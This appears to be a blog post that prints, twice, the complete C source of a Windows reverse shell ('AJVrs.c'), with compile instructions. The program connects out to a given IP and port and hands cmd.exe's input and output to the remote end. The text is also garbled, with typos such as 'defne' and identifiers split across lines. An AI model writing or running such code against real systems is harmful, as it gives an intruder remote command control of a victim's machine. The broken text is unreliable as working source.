AJVrs.c
Reverse shell in win32
(c) by Andreas Venieris (aka thiseas) 2010
Compile with VS 2008 from command line with cl:
C:> cl AJVrs.c
******************************************************
*********/
#include <winsock2.h>
#include <stdio.h>
#pragma comment(lib, "Ws2_32.lib") // Inform the
linker that
// the Ws2_32.lib
fle is needed.
#defne DEFAULT_PORT 1234
#defne DEFAULT_IP "192.168.1.70"
WSADATA wsaData;
SOCKET Winsocket;
STARTUPINFO theProcess;
PROCESS_INFORMATION info_proc;
struct sockaddr_in Winsocket_Structure;
int main(int argc, char *argv[])
{
char *IP = DEFAULT_IP;
short port = DEFAULT_PORT;
if (argc == 3){
strncpy(IP,argv[1],16);
port = atoi(argv[2]);
}
WSAStartup(MAKEWORD(2,2), &wsaData);
Winsocket=WSASocket(AF_INET, SOCK_STREAM,
IPPROTO_TCP,NULL, (unsigned int)
NULL, (unsigned int) NULL);
Winsocket_Structure.sin_port=htons(port);
Winsocket_Structure.sin_family=AF_INET;
Winsocket_Structure.sin_addr.s_addr=inet_
addr(IP);
if(Winsocket==INVALID_SOCKET)
{
WSACleanup();
return 1;
}
if(WSAConnect(Winsocket,(SOCKADDR*)&Winsocket_Str
ucture,sizeof(Winsocket_Structure),NULL,NULL,NULL,NULL) == SOCKET_ERROR)
{
WSACleanup();
}
// Starting shell by creating a new process with
i/o redirection.
memset(&theProcess,0,sizeof(theProcess));
theProcess.cb=sizeof(theProcess);
theProcess.dwFlags=STARTF_USESTDHANDLES;
// here we make the redirection
theProcess.hStdInput = theProcess.hStdOutput
= theProcess.hStdError =
(HANDLE)Winsocket;
// fork the new process.
if(CreateProcess(NULL,"cmd.exe",NULL,NULL,TRUE,
0,NULL,NULL,&theProcess,&info_
proc)==0)
{
WSACleanup();
return 1;
}
return 0;
}
Reverse shell in win32
(c) by Andreas Venieris (aka thiseas) 2010
Compile with VS 2008 from command line with cl:
C:> cl AJVrs.c
******************************************************
*********/
#include <winsock2.h>
#include <stdio.h>
#pragma comment(lib, "Ws2_32.lib") // Inform the
linker that
// the Ws2_32.lib
fle is needed.
#defne DEFAULT_PORT 1234
#defne DEFAULT_IP "192.168.1.70"
WSADATA wsaData;
SOCKET Winsocket;
STARTUPINFO theProcess;
PROCESS_INFORMATION info_proc;
struct sockaddr_in Winsocket_Structure;
int main(int argc, char *argv[])
{
char *IP = DEFAULT_IP;
short port = DEFAULT_PORT;
if (argc == 3){
strncpy(IP,argv[1],16);
port = atoi(argv[2]);
}
WSAStartup(MAKEWORD(2,2), &wsaData);
Winsocket=WSASocket(AF_INET, SOCK_STREAM,
IPPROTO_TCP,NULL, (unsigned int)
NULL, (unsigned int) NULL);
Winsocket_Structure.sin_port=htons(port);
Winsocket_Structure.sin_family=AF_INET;
Winsocket_Structure.sin_addr.s_addr=inet_
addr(IP);
if(Winsocket==INVALID_SOCKET)
{
WSACleanup();
return 1;
}
if(WSAConnect(Winsocket,(SOCKADDR*)&Winsocket_Str
ucture,sizeof(Winsocket_Structure),NULL,NULL,NULL,NULL) == SOCKET_ERROR)
{
WSACleanup();
}
// Starting shell by creating a new process with
i/o redirection.
memset(&theProcess,0,sizeof(theProcess));
theProcess.cb=sizeof(theProcess);
theProcess.dwFlags=STARTF_USESTDHANDLES;
// here we make the redirection
theProcess.hStdInput = theProcess.hStdOutput
= theProcess.hStdError =
(HANDLE)Winsocket;
// fork the new process.
if(CreateProcess(NULL,"cmd.exe",NULL,NULL,TRUE,
0,NULL,NULL,&theProcess,&info_
proc)==0)
{
WSACleanup();
return 1;
}
return 0;
}
0 comments:
Post a Comment